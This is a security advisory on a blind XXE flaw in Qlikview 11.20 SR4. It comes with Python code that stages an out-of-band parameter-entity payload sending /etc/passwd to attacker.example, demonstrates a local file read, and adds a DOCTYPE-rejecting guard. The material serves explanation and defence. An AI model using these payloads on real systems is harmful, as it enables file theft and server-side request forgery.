Qlikview 11.20 SR4 Blind XXE Injection
Posted by deepcore on September 10, 2015 – 4:15 am
The Qlikview platform is vulnerable to XML External Entity (XXE) injection. More specifically, it processes attacker-supplied DTD parameter entity declarations, and the injection is "blind": the server returns no entity content in its response, so any extracted data has to be pushed out of band. These flaws can be exploited to force Server-Side Request Forgery (SSRF) over multiple protocols, as well as to read and extract arbitrary files from the server. Version 11.20 SR4 is vulnerable.
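The mechanics behind the advisory, as an added example that is not part of the original post and does not touch Qlikview itself: how a blind, parameter-entity XXE is staged in two parts (the injected DOCTYPE and the attacker-hosted DTD that forces the out-of-band request), a local demonstration of the underlying file read using Python's stdlib SAX parser with external entity resolution switched on versus off, and a pre-parse guard that rejects any document carrying a DOCTYPE. The listener host `attacker.example`, the target path and the secret file are constructed for the demo.

```python
"""Added example: blind parameter-entity XXE staging, the file read it relies
on, and a guard. Not Qlikview code; all hosts, paths and secrets are
constructed for this demo."""
import io
import os
import re
import tempfile
import xml.sax
import xml.sax.handler
from pathlib import Path


def oob_payload(collaborator: str, target_file: str) -> tuple:
    """Return (document, external_dtd) for a blind, out-of-band XXE.

    The document only pulls in the attacker-hosted DTD. That DTD defines
    %file (the target's content), %eval (whose expansion declares %exfil)
    and %exfil, which makes the server request a URL carrying the file
    content. The response shows nothing; the data lands on the listener.
    """
    doc = (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE r [ <!ENTITY % dtd SYSTEM "http://{collaborator}/x.dtd"> %dtd; ]>\n'
        '<r/>'
    )
    dtd = (
        f'<!ENTITY % file SYSTEM "file://{target_file}">\n'
        # &#x25; is an escaped "%" so the inner declaration survives one expansion
        '<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM '
        f"'http://{collaborator}/?d=%file;'>\">\n"
        '%eval;\n'
        '%exfil;\n'
    )
    return doc, dtd


class _Collect(xml.sax.handler.ContentHandler):
    """Gathers character data so we can see what the parser expanded."""

    def __init__(self):
        super().__init__()
        self.text = []

    def characters(self, content):
        self.text.append(content)


def parse_with_entities(xml_bytes: bytes, resolve_external: bool) -> str:
    """Parse with stdlib SAX/expat. resolve_external=True mirrors a parser that
    follows SYSTEM identifiers (the vulnerable configuration); False is the
    Python default since 3.7.1 and leaves the entity unexpanded."""
    parser = xml.sax.make_parser()
    parser.setFeature(xml.sax.handler.feature_external_ges, resolve_external)
    handler = _Collect()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.text).strip()


def demo_file_read() -> tuple:
    """Write a constructed secret to a temp file and pull it back via a
    classic in-band external entity; returns (leaked, safe) text."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("s3cr3t-token")
        path = f.name
    try:
        uri = Path(path).as_uri()  # file:///... on POSIX
        xml_doc = (f'<!DOCTYPE r [<!ENTITY xxe SYSTEM "{uri}">]>'
                   '<r>&xxe;</r>').encode()
        leaked = parse_with_entities(xml_doc, resolve_external=True)
        safe = parse_with_entities(xml_doc, resolve_external=False)
        return leaked, safe
    finally:
        os.unlink(path)


_DOCTYPE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)


def rejects_dtd(xml_bytes: bytes) -> bool:
    """Pre-parse guard for an endpoint that never legitimately needs a DTD:
    refuse the whole document if a DOCTYPE appears anywhere. Coarse by
    design (a DOCTYPE inside a comment is also rejected), which is the safe
    direction when you cannot change the parser's own settings."""
    return _DOCTYPE.search(xml_bytes) is not None


if __name__ == "__main__":
    document, external_dtd = oob_payload("attacker.example", "/etc/passwd")
    print(document)
    print(external_dtd)
    print(demo_file_read())
```

The in-process demo uses a general entity because that is what a local parser will expand without network access; the parameter-entity version in `oob_payload` is the one that matters for a blind target, since the `%exfil;` expansion turns the file content into an outbound request the attacker observes on their own listener.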